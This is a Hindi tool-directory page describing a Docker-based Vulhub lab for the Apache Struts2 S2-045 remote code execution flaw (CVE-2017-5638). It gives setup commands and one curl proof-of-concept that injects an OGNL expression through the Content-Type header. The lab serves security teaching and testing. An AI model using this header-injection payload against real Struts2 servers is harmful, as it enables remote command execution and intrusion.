Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
vulhub-struts2 — Apache Struts2 (CVE-2017-5638) में एक गंभीर रिमोट कोड निष्पादन (RCE) कमजोरी के शोषण को प्रदर्शित करने वाली एक व्यावहारिक प्रयोगशाला, जो Vulhub Docker वातावरण का उपयोग करती है। इसमें असुरक्षित कंटेनर चलाने के लिए सेटअप निर्देश और कमांड शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/soufiane-benchahyd/vulhub-struts2
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubsoufiane-benchahyd/vulhub-struts2

vulhub-struts2

Apache Struts2 (CVE-2017-5638) में एक गंभीर रिमोट कोड निष्पादन (RCE) कमजोरी के शोषण को प्रदर्शित करने वाली एक व्यावहारिक प्रयोगशाला, जो Vulhub Docker वातावरण का उपयोग करती है। इसमें असुरक्षित कंटेनर चलाने के लिए सेटअप निर्देश और कमांड शामिल हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

Apache Struts2 S2-045 RCE (CVE-2017-5638)

📌 अवलोकन

यह प्रोजेक्ट Apache Struts2 (CVE-2017-5638) में दूरस्थ कोड निष्पादन (RCE) कमजोरी को प्रदर्शित करता है।

हमलावर एक निर्मित HTTP Content-Type हेडर का शोषण करके कमजोर सर्वरों पर मनमाना सिस्टम कमांड निष्पादित कर सकते हैं।

यह रिपॉजिटरी कमजोरी का परीक्षण और समझने के लिए एक सुरक्षित वातावरण प्रदान करने हेतु Vulhub Docker labs का उपयोग करता है।


🛠 वातावरण सेटअप

  • होस्ट: Ubuntu 24.04 (VirtualBox या Native)
  • Docker & Docker Compose
  • Vulhub लैब
  • Apache Struts2 संस्करण: 2.3.30

🚀 शुरू करना

1️⃣ इस रिपॉजिटरी को क्लोन करें

root@kitploit:~
git clone https://github.com/soufiane-benchahyd/vulhub-struts2.git
cd vulhub-struts2/struts2/s2-045

2️⃣ कमजोर कंटेनर शुरू करें

root@kitploit:~
docker compose up -d

3️⃣ कंटेनर चल रहा है सत्यापित करें

root@kitploit:~
docker ps

आपको कुछ इस प्रकार देखना चाहिए:

root@kitploit:~
CONTAINER ID   IMAGE                   COMMAND                  STATUS      PORTS
xxxxxxx        vulhub/struts2:2.3.30   "/usr/local/bin/mvn-…"   Up          0.0.0.0:8080->8080/tcp

4️⃣ वेब इंटरफ़ेस का परीक्षण करें

अपना ब्राउज़र खोलें → http://<VM_IP>:8080 आपको Struts2 एप्लिकेशन का होमपेज देखना चाहिए।

VM IP उदाहरण: 192.168.56.101


💻 शोषण

⚠️ केवल नियंत्रित प्रयोगशाला वातावरण में ही शोषण करें। सार्वजनिक सर्वरों पर कभी हमला न करें।

अब आप कमजोर कंटेनर के विरुद्ध curl या Metasploit जैसी स्क्रिप्ट या टूल का उपयोग करके RCE का परीक्षण कर सकते हैं।

उदाहरण (अपने परीक्षण कमांड से <command> बदलें):

root@kitploit:~
curl -v -H "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','test')}" http://<VM_IP>:8080/

📝 नोट्स

  • यह लैब सुरक्षित है: सभी क्रियाएं Docker के अंदर होती हैं।
  • आपके परीक्षण के स्क्रीनशॉट बाद में GitHub पर जोड़े जा सकते हैं।
  • आप पूर्ण सीखने के पोर्टफोलियो के लिए इस रिपॉजिटरी को अन्य Struts2 कमजोरियों के साथ विस्तारित कर सकते हैं।

⚡ संदर्भ

  • Apache Struts2 S2-045 CVE
  • Vulhub GitHub
टूल डाउनलोड करें